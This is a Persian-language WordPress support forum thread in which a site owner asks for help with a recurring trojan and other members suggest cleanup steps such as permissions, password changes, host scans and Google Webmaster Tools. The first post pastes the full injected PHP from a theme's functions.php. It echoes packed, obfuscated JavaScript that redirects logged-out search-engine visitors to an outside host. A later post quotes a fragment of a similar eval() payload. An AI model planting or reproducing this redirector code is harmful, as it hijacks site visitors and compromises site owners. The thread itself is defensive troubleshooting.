تروجان

[eskafild 5]

سلام یه تروجان افتاده تو قالبم هی می پاکم بر میگرده چه کنم؟ورژن وردپرس رو هم ارتقاع دادم فایده نداد

<?php
add_action('get_footer', 'add_sscounter');
function add_sscounter(){
echo '<!--scounter-->';
if(function_exists('is_user_logged_in')){
if(time()%2 == 0 && !is_user_logged_in()){
echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function©{return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e©]=k[c]||e©;k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e©+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";

[محسن غیاثی 1853]

سلام دوست عزیز

احتمالا شل آپلود شده تو سایتتون. میتونین از مسئول هاستتون درخواست کنین در صورت امکان چک و فایل مخرب رو پیدا کنن. افزونه‌ی Threat Scan هم ممکنه مورد رو تشخیص بده.

حتما فایل wp-config.php رو به یک پوشه بالاتر از سطحی که وردپرس نصب شده منتقل کنین و پرمیژنش رو ۴۰۰ یا ۴۴۰ قرار بدین.

[Morteza 34190]

در تکمیل حرف محسن عزیز

این یک redirector هست و تنها مشکلی که ایجاد میکنه استاپ شدن صفحه توسط آنتی ویروسهاست.

تغییر سطح دسترسی فایل wp-config.php بهترین گزینه خواهد بود.

[eskafild 5]

ببخشیدا این کد رو من از(functions.php) پیدا کردم این رو حذف کردنی دیگه ویروس کش خطا نمیدخ]ولی یه مدت دیگه دوباره بر می گرده

[Mostafa 2587]

هنوز راه نفوذ این تروجان به functions.php پوسته کاملا مشخص نشده.

تااونجایی که بررسی کردم، این کد به صورت خوکار از plugin-editor.php و theme-editor.php نفوذ میکند!

برای رفع همین مشکل، میتونید موقت از این افزونه webstudio استفاده کنید و در صفحه تنظیمات، ویرایشگر کدها را غیرفعال کنید.

فکر کنم یکی از افزونه های محبوب وردپرس، باگ کوچکی داشته باشه که باعث این مشکل شده باشه. چون خیلی از سایت ها سریعا به این تروجان آلوده میشن و وردپرس هم حرفی از این تروجان نزده!

[Parsa 23463]

در ادامه بحث

پرمیژن نوشتن را هم از فایل functions قالب بگیرید. => 400

[eskafild 5]

هنوز راه نفوذ این تروجان به functions.php پوسته کاملا مشخص نشده.

تااونجایی که بررسی کردم، این کد به صورت خوکار از plugin-editor.php و theme-editor.php نفوذ میکند!

برای رفع همین مشکل، میتونید موقت از این افزونه webstudio استفاده کنید و در صفحه تنظیمات، ویرایشگر کدها را غیرفعال کنید.

فکر کنم یکی از افزونه های محبوب وردپرس، باگ کوچکی داشته باشه که باعث این مشکل شده باشه. چون خیلی از سایت ها سریعا به این تروجان آلوده میشن و وردپرس هم حرفی از این تروجان نزده!

ممنون انجام دادم راستی تو گوگل سایتم رو سرچ کردم میگه:

این وبگاه ممکن است به رایانه شما آسیب وارد نماید.

http://support.google.com/websearch/bin/answer.py?hl=en&answer=45449

این چی بید؟

[Morteza 34190]

سایت شما malware یا همون بدافزار هم داره.

در بخش google webmaster اکانت دارید؟

در اونجا محل بدافزار رو بهتون میگه.

[tazeh 625]

سایت شما malware یا همون بدافزار هم داره.

در بخش google webmaster اکانت دارید؟

در اونجا محل بدافزار رو بهتون میگه.

سلام

همین همین خطا رو هم برای وب سایت من رخ داده .

من از دوافزونه anti-malware و Expolit scanner استفاده کردم ، و افزونه ها رو حذف و دوباره نصب کردم و وردپرس رو هم بروز رسانی کردم.

الان ورودی گوگل افزایش یافته ولی هنوز این خطا از زیر وب سایتم پاک نشده ، حدود 8 روزه که من وردپرس رو بروز رسانی کرده ام.

This site may be compromised.

در گوگل وب مستر هم صفحات آلوده رو نشون داده.

من باید اون صفحه ها رو حذف کنم؟

[Mostafa 2587]

ممنون انجام دادم راستی تو گوگل سایتم رو سرچ کردم میگه:

این وبگاه ممکن است به رایانه شما آسیب وارد نماید.

http://support.googl...en&answer=45449

این چی بید؟

1. ابتدا کل سیستمتون رو با برنامه male ware byte اسکن کنید

2. پسورد FTP و Host رو تغییر بدین.

3. همانطور که مرتضی گفت، از گوگل وبمستر هم اقدام کنید.

فایرفاکس هم از دیتابیس گوگل برای تشخیص آلوده بودن سایت استفاده میکنه! سریعا باید اقدام کنید.

[Mostafa 2587]

سلام

همین همین خطا رو هم برای وب سایت من رخ داده .

من از دوافزونه anti-malware و Expolit scanner استفاده کردم ، و افزونه ها رو حذف و دوباره نصب کردم و وردپرس رو هم بروز رسانی کردم.

الان ورودی گوگل افزایش یافته ولی هنوز این خطا از زیر وب سایتم پاک نشده

This site may be compromised.

در گوگل وب مستر هم صفحات آلوده رو نشون داده.

من باید اون صفحه ها رو حذف کنم؟

سلام، شما هم میتونید این مراحل را طی کنید.

نیازی به حذف نیست!

البته این ویروس همیشه در دیتابیس جای میگیرد! یکسری کدمخرب هست و در بیشتر صفحات ظاهر میشود. دیتابیس را تعمیر و بهینه کنید مشکل رو حل میکند.

البته بعضی هاشون یک Table جداگونه برای این کار دارند D:

[Saeed Fard 4740]

ممنون انجام دادم راستی تو گوگل سایتم رو سرچ کردم میگه:

این وبگاه ممکن است به رایانه شما آسیب وارد نماید.

http://support.googl...en&answer=45449

این چی بید؟

به نظر من بهتره با پشتيباني هاست‌تون موضوع رو در ميان بزاريد ، اون‌ها با اسكنر‌هاي قوي خودشون هاست شما رو اسكن و از بد افزار خالي ميكنند ..

بعد اين هم طبق گفته‌ي آقا مصطفي عزيز تمامي پسورد‌ها رو عوض كنيد و مسائل امنيتي رو رعايت كنيد ..

[tazeh 625]

من همه ی کارهایی رو که گفتید انجام دادم

ولی هنوز گوگل همون خطا رو می ده و دیگه اینکه بعد از بروز رسانی وردپرس جفنگ زیاد نمی یومد . اما الان دوباره زیاد میاد

بیشتر مشکل هم تو افزونه exe-php که دارای تروجان هست. که یک افزونه بسیار کاربردی برای منه.

و تابع های eval() توی فایل های مختلف php وجود داره. که با Expolit scanner میزنم می گه که کدهای مخرب eval()

مثلا:wp-content/plugins/wp-jalali/inc/js/editjalali.js:1

eval(function(p,a,c,k,e,d){e=function©{return(c<a?

باید چطوری این تابع های خطرناک رو حذف کرد و از دوباره ایجاد شدن این تابع ها در وردپرس جلوگیری کرد؟

[Morteza 34190]

احتمال زیاد مشکل از سمت سرور شماست که آلوده شده.

اگر از سرور باشه شما خیلی نمیتونی کار خاصی انجام بدی و باید مدیر سرور پاکسازی انجام بده.

این کدی هم که دادین :

eval(function(p,a,c,k,e,d){e=function©{return(c<a?

تکه ایی از یک بدافزار هست. و اینطور که گوگل آلرت میده بصورت وسیع روی سرور شما پخش شده.

[Mostafa 2587]

با نظر مرتضی موافقم! شما نمیتونید دقیقا بررسی کنید و تک تک فایل هارا ببینید. با میزبانی خود تماس بگیرید و از ایشون بخواهید که کلمه eval را در تمام فایل های شما سرچ کنید و نتیجه را به شما بدهد.

به این نکنه هم توجه کنید که بعد از پاکسازی تروجان، کمی زمان میبرد تا وب گاه شما در دسترسی قرار گیرد

[eskafild 5]

ببخشید گوگل وب مستر که یه کد میده تو head بزنیم اون رو قسمت رو توی قالب پیدا نمی کنم، چطور فعالش کنم تو وب مستر؟

[Morteza 34190]

ببخشید گوگل وب مستر که یه کد میده تو head بزنیم اون رو قسمت رو توی قالب پیدا نمی کنم، چطور فعالش کنم تو وب مستر؟

مربوط به چی هست؟!

[tazeh 625]

سلام به دوستان

با توجه به راهنمایی که کردید ، انجام دادم و الان اون خطا که در زیر وب سایتم در گوگل بود پاک شده و ورودی گوگل هم افزایش یافته

با تشکر فراوان از اساتید

[eskafild 5]

مربوط به چی هست؟!

کدی که قرار می دیم تو سایت تا با گوگل وب مستر ارتباط برقرار کنه!

شما از کدوم روش استفاده می کنید؟

[Morteza 34190]

منظورتون کد آنالیزور گوگل هست؟

[eskafild 5]

بله کد وبمستر که می ده تو کدوم پوشه از کد ها باید گذاشت؟

[Morteza 34190]

کد جاوااسکریپت هست.

باید در فایل header و قبلا از

</head>

قرار بدید.

یعنی داخل تگ head باشه.

[pichgooshti 23]

سلام

میشه یه نگاه هم به وبسایت من بندازید؟

Pichgooshti.com

اصلا نمیتونم واردش بشم. هم مرورگر و هم ویروسیاب گیر میدن.

وارد سی پنل هم که میشم، مرورگر گیر میده و اصلا وارد فایل منیجر سی پنل نمیتونم بشم. خیلی وقته اینجوره (تقریبا دیگه از وبسایت هیچی نمونده).

[Saeed Fard 4740]

سلام ، به انجمن خوش اومديد ..

دوست عزيز سايت شما داراي بد افزار هستش و اسپم شده ، من قبلا ديده بودم سايتتون رو خيلي وقته اينجوري هستش ، چرا هيچ اقدامي نكرديد تا الان ؟

با هاستتون كه دسترسي نداريد ؟ بهتره با پشتيباني سرورتون تماس بگيريد تا هاستتون رو اسكن كنند ، يا خيلي بهترش اينه كه به غير از wp-config و theme تمامي فايل‌هاي هاستتون رو پاك كنند كه حداقل از اين حالت خارج بشه ، و از نو وردپرس رو نصب و راه‌اندازي كنيد ..

[pichgooshti 23]

سلام ، به انجمن خوش اومديد ..

دوست عزيز سايت شما داراي بد افزار هستش و اسپم شده ، من قبلا ديده بودم سايتتون رو خيلي وقته اينجوري هستش ، چرا هيچ اقدامي نكرديد تا الان ؟

با هاستتون كه دسترسي نداريد ؟ بهتره با پشتيباني سرورتون تماس بگيريد تا هاستتون رو اسكن كنند ، يا خيلي بهترش اينه كه به غير از wp-config و theme تمامي فايل‌هاي هاستتون رو پاك كنند كه حداقل از اين حالت خارج بشه ، و از نو وردپرس رو نصب و راه‌اندازي كنيد ..

ممنون

خب اصلا وقتش نبوده.

یعنی میفرمایید کل اطلاعاتش (یعنی بیش از 1000 تا پست) هم باید پاک بشه؟

ویرایش شده تیر 91 توسط pichgooshti